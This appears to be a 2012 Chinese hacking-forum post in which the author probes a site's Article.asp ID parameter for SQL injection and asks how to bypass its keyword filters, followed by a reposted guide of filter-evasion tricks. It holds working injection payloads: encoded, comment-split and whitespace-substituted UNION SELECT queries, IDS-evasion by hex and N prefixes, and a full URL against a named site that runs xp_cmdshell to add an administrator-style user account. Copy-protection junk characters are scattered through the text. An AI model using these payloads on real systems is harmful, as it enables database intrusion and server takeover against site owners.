路过这个网站,检测了一下.
$ F( d: \. G: q2 Z5 J; p) Rhttp://www.xxx.cn/Article.asp?ID=117 and 1=1
( C" O' o& P% r1 ~直接返回主页( l: _3 o7 f2 \' q" R
http://www.xxx.cn/Article.asp?ID=117 or 1=1# E/ P/ \- I; W0 z% t! W) M! k9 `
直接返回主页
, N# o+ H- d1 H7 }http://www.xxx.cn/Article.asp?ID=117 or. k3 [: v2 X* }
没有返回主页 没有过滤or
% }* ~4 w' M% U( Y: Thttp://www.xxx.cn/Article.asp?ID=117 and
- u7 Q- @% B, T) l, z直接返回主页 看来过滤了and
h5 t7 J8 J; H; l) v% O* h+ chttp://www.xxx.cn/Article.asp?ID=117 or 1
$ b e# O! k: u( o/ D$ X没有返回主页 即没有过滤or 也没有过滤1
0 N& ^& b. H7 F' Xhttp://www.xxx.cn/Article.asp?ID=117 or 1=1
: g- @9 k. [+ d) b% Z3 x直接返回主页 很明显过滤了等号
" `% D" k4 _9 h3 ~or的特性是与and相反的.
/ \" } u1 f. }$ H/ }( [or 1=1 爆错 或与原页面不同
- Q' B: \2 j. t0 mor 1=2 原页面相同/ n* @* {0 s0 d$ Z- p
这样就是一个注入点
5 s. I3 Q7 c3 T9 G C" s0 |. |9 X3 N但他过滤了=号 我就用><号代替=号吧!
7 b b2 [$ Q8 E. @- D( for 1<2 很明显是正确的,所以应该与原页面不同% N# v. ?9 g& s) Q+ Z1 \
or 1>2 很明显是错误的,所以应该与原页面相同" K8 i" E0 C0 c* ]0 j4 o" [0 U! ?
然后看看有没有过滤其他的查询语句,比如select.
, m* t2 L1 Y: w; \% Lhttp://www.xxx.cn/Article.asp?ID=117 select) B3 v g L8 e' ^6 T
直接返回主页/ h% @5 ]2 H+ @7 V0 l
又迷茫了../ E9 I! o! o' i
1 O+ A# K, ^: d# J2 S j3 Z5 O3 D2 p$ }. \% e
cookies注入.和以下的方法全都试过了,都失败了.还有什么方法可以饶过吗
: v+ I" {: r6 _& z& j0 V# Z* U; x这个系统我以为是my动力,后台却是这样的http://www.xxx.cn/admin.asp(应该不是假够台吧)
0 X" G v q; e4 {================================================
7 r+ u, P, t$ R5 \4 E以下是转贴:
9 S( t( L- G. b9 S/ Z, x$ y& a3 N! \; t
突然想我们是否可以用什么方法绕过SQL注入的限制呢?到网上考察了一下,提到的方法大多都是针对AND与“’”号和“=”号过滤的突破,虽然有点进步的地方,但还是有一些关键字没有绕过,由于我不常入侵网站所以也不敢对上述过滤的效果进行评论,但是可以肯定的是,效果不会很好…… : L) e. C4 Z6 c. k
经过我的收集,大部分的防注入程序都过滤了以下关键字:
9 M* a4 Q& `* | C' N: s3 Pand | select | update | chr | delete | %20from | ; | insert | mid | master. | set | =
9 Y* M3 m' e4 w b# M而这里最难处理的就是select这个关键字了,那么我们怎样来突破他们呢?问题虽未完全解决,但还是说出来与大家分享一下,希望能抛砖引玉。
# l- J4 U( N- Q) n0 m9 m: E- j* u对于关键字的过滤,以下是我收集的以及我个人的一些想法。
" p+ j, D) X3 \: J1、运用编码技术绕过
# P# V8 q# d ^* Q0 S" X5 _如URLEncode编码,ASCII编码绕过。例如or 1=1即 ; ] F# S# q7 G& O3 ~2 y+ t( V1 F$ _
%6f%72%20%31%3d%31,而Test也可以为CHAR(101)+CHAR(97)+CHAR(115)+CHAR(116)。 ! |( u5 R! ]0 @6 ?
; `3 C! P, Q" m U& E
2、通过空格绕过 ) D- R( l4 W% U% f! ]
如两个空格代替一个空格,用Tab代替空格等,或者删除所有空格,如
2 u% u7 D9 Q" A, J2 Yor’ swords’ =‘swords’ 3 [ _4 y, F9 _% o4 L
,由于mssql的松散性,我们可以把or ’swords’ 之间的空格去掉,并不影响运行。 & F. }. v' i" E; s+ A
3、运用字符串判断代替 8 U2 b) i; S" `1 P
用经典的or 1=1判断绕过,如
/ _( c2 H# `# i- B: _9 I# gor ’swords’ =’swords’
7 }. F" |5 r" N. S& N7 {! w7 D,这个方法就是网上在讨论的。
. N: A: A7 Z7 |7 Z% D# g4、通过类型转换修饰符N绕过 " E9 @7 F/ c: f: c
可以说这是一个不错的想法,他除了能在某种程度上绕过限制,而且还有别的作用,大家自己好好想想吧。关于利用,如or ’swords’ = N’ swords’ ,大写的N告诉mssql server 字符串作为nvarchar类型,它起到类型转换的作用,并不影响注射语句本身,但是可以避过基于知识的模式匹配IDS。
i2 p: D2 a+ K' J) `7 x& L5、通过+号拆解字符串绕过
' P4 _9 e) S; X+ [效果值得考证,但毕竟是一种方法。如 - x8 a4 J; Z9 G
or ’swords’ =‘sw’ +’ ords’ ;EXEC(‘IN’ +’ SERT INTO ’+’ …..’ ) 7 t B6 c4 Q' |) C1 t8 J
6 i P: d! f/ {/ v- k* ~& O6、通过LIKE绕过 0 p% o" [3 [6 V' m9 @2 G
以前怎么就没想到呢?如or ; v2 c- O4 M* w
’swords’ LIKE ’sw’
; {8 Z A+ y. e- k$ j/ Z+ }$ w!!!显然可以很轻松的绕过
" w5 Z; _* G( G“=”“>” & b% y; D4 S2 W8 `) [1 `& H: ?
的限制……
" C- t& g# @/ Z8 V( Z& w% C7、通过IN绕过
! G" @8 D+ S( g+ ~* |; x# e1 X* @: g! e与上面的LIKE的思路差不多,如 / U: m' ~( K! A3 e
or ’swords’ IN (’swords’) , i' `+ `) @, z/ Z, ~' m' |' t0 O
6 }5 h1 C3 \+ z; O, A5 \7 G8、通过BETWEEN绕过
" q7 F/ L8 _: [, f: {如
; F0 q, X% X2 S) r G Lor ’swords’ BETWEEN ’rw’ AND ’tw’
8 o2 `0 _" c# @$ {+ Z# ?
0 D- @8 x4 A: i) Z* n9、通过>或者<绕过
$ r: Y% Z* }6 o3 a/ ]4 `9 sor ’swords’ > ’sw’
6 E: z; T$ Y. u; o& k$ nor ’swords’ < ’tw’ 1 d' K' x1 r9 l; z0 q
or 1<3
2 }- M# G/ ~# E1 K5 p, M……
3 U/ \! d3 H8 |4 |10、运用注释语句绕过 ! x& J, c! Z) X
用/**/代替空格,如: 4 A6 [/ Q) T5 Q1 Z+ Y( h% |: w) ]8 `
UNION /**/ Select /**/user,pwd,from tbluser 4 a$ z, W1 m. F% @+ h: A+ E* ^
. j# n. z4 K1 k8 _; E7 {1 f- h用/**/分割敏感词,如: ) {3 M) [' h5 P& m S7 v6 H0 z
U/**/ NION /**/ SE/**/ LECT /**/user,pwd from tbluser 2 t; [. x3 i8 o. S' \* i0 G: N- W
6 M$ P8 {& C/ I' e
11、用HEX绕过,一般的IDS都无法检测出来 ' u* b& h9 Q9 n& V0 a
0x730079007300610064006D0069006E00 =hex(sysadmin) " z' _- C ]0 U. e0 [4 Q# G$ h. t
0x640062005F006F0077006E0065007200 =hex(db_owner)
- h/ r+ N+ D% X1 N另外,关于通用点的过滤方法,我们可以考虑采用赋值的方法,例如先声明一个变量a,然后把我们的指令赋值给a,然后调用变量a最终执行我们输入的命令。变量a可以是任何命令。如下:
5 C; i. L1 X' d2 Q8 q: i1 d declare @a sysname
! M! C; v) f) f& q, D# _" U select @a=
& K6 R1 k; r, I0 o3 w exec master.dbo.xp_cmdshell @a 1 _. m9 ?7 n! L4 R
效果 0 n- X( l' G! j. w$ r
http://www.ilikeplmm.com/show.asp?id=1;declare%20@a% [email=20sysname%20select%20@a=0x6e006500740020007500730065007200200061006e00670065006c002000700061007300730020002f00610064006400%20exec%20master.dbo.xp_cmdshell%20@a]20sysname%20select%20@a=0x6e006500740020007500730065007200200061006e00670065006c002000700061007300730020002f00610064006400%20exec%20master.dbo.xp_cmdshell%20@a[/email];--
2 w. ?, p U: h& m4 T% ~' y7 |6 d( _3 q0 M) o# a5 N9 [. j
其中的
7 T2 T0 a$ w4 U, x1 b% f! m0x6e006500740020007500730065007200200061006e00670065006c002000700061007300730020002f00610064006400 , k7 L3 ^5 G( b( X% m5 `8 T5 C
就是 . S/ n2 o, k9 R+ u& r. ]) i
“net user angel pass /add”
5 {6 h" p' l9 v& n" b3 y) E4 w: o) a- t6 b2 E0 Y
一直以来都以为只有空格,tab键和注释符/**/可以用来切割sql关键字,段时间在邪八看了风迅cms注入漏洞那篇帖子,才知道原来回车也可以用来作为分割符(以前竟然没有想到,真是失败)。回车的ascii码是chr(13)&chr(10),至于为什么要两个连在一起,这个我也不知道。转换成url编码形式是%0d%0a,于是就可以用%0d%0a代替空格pass一些过滤空格的检查了。) V% [1 @4 l( ]$ H7 l. u3 t
引申一下,只用%0d能正常执行语句吗?只用%0a呢?测试证明,用任意一种分割在mssql、mysql和access里面都是可以的。! [8 e' ~+ H0 L
另外,关于mssql的多语句问题。我以前一直以为必须用分号作为语句的结尾,后来发现,完全不是那样。类似/ g$ T5 s4 t- Q9 R+ a' X/ S/ H/ g
Copy code! L7 `/ o) j: s4 e7 N
select * from table exec xp_cmdshell'xxxxxxxxxx'( e. H# D7 [: w3 Z' F
1 r1 @/ b- s- q X- R
6 f# e% Y1 B" [- v( P+ P$ f, |select * from table/**/exec xp_cmdshell'xxxxxxxxxx'
* b1 t) r2 n4 F7 q. Q8 h2 S" _
9 q# ` q' q% _8 F* g" w& F- c: e t- g! V2 F* P" H
select * from table|---tab---|exec xp_cmdshell'xxxxxxxxxx'( t }# B& |7 h. V7 A+ [4 V
' D+ _" `; ~1 }! i9 K: R& N
# {# ]( I4 _' k' S5 y
select * from table|---enter---|exec xp_cmdshell'xxxxxxxxxx') z; e3 J7 y u7 C+ k9 Y: R
- D- i1 |, Y3 x7 E* r: `
的语句都是可以正常执行的。而我以前竟然一直不知道!不过这个貌似跟连接数据库驱动有关系,odbc可以正常执行,sqloledb的话就会报错。有兴趣的继续研究吧?
3 S2 x, @6 {6 e* c: l# g& {4 k- H, f
这样,以后遇到带空格过滤关键字的拦截程序,又可以发挥发挥了1 S9 I8 L5 h% E3 M" N" m
可能大家早就知道了,不管怎么说,发在这里吧!
: G2 }+ f, H9 ~# P4 L! {6 V, ?( _& Q! G) K, B2 N' S
最近想起可能还有些ascii码可以用来在sql语句中代替空格,于是写个脚本测试了一下,结果在所有128个低位ascii字符中,chr(12)也可以在access里用,不过貌似chr(12)不能出现在and、or之类的关键词附近,原因不清楚。mysql中比access多一个chr(11)可以。至于mssql,挖日,直接从1到32的ascii码换成字符后都可以正常使用。
$ U3 `& _1 ~6 r; c' h# S& f
; c2 t/ f* U' w9 f) E, k
7 y$ B; p' _. w; f& v8 T+ p; N7 e2 V k. i+ |
对于中间应该出现空格的地方,用()进行替换,不过,对于很复杂的SQL语句就不太好用了。上面说到的是字符型的,如果是数值型,可以在id=1后加一个括号,不过这个我没有测试,/ O9 O8 S0 @$ y; A
比如:jmdcw.asp?id=(1)and(select.....),应该是可行的吧? 8 M+ ?( D* F: z" r5 O5 H
# P7 _& O: A' M f- ^3 l @
|
发表于 2012-9-15 14:47:46
收藏
支持
反对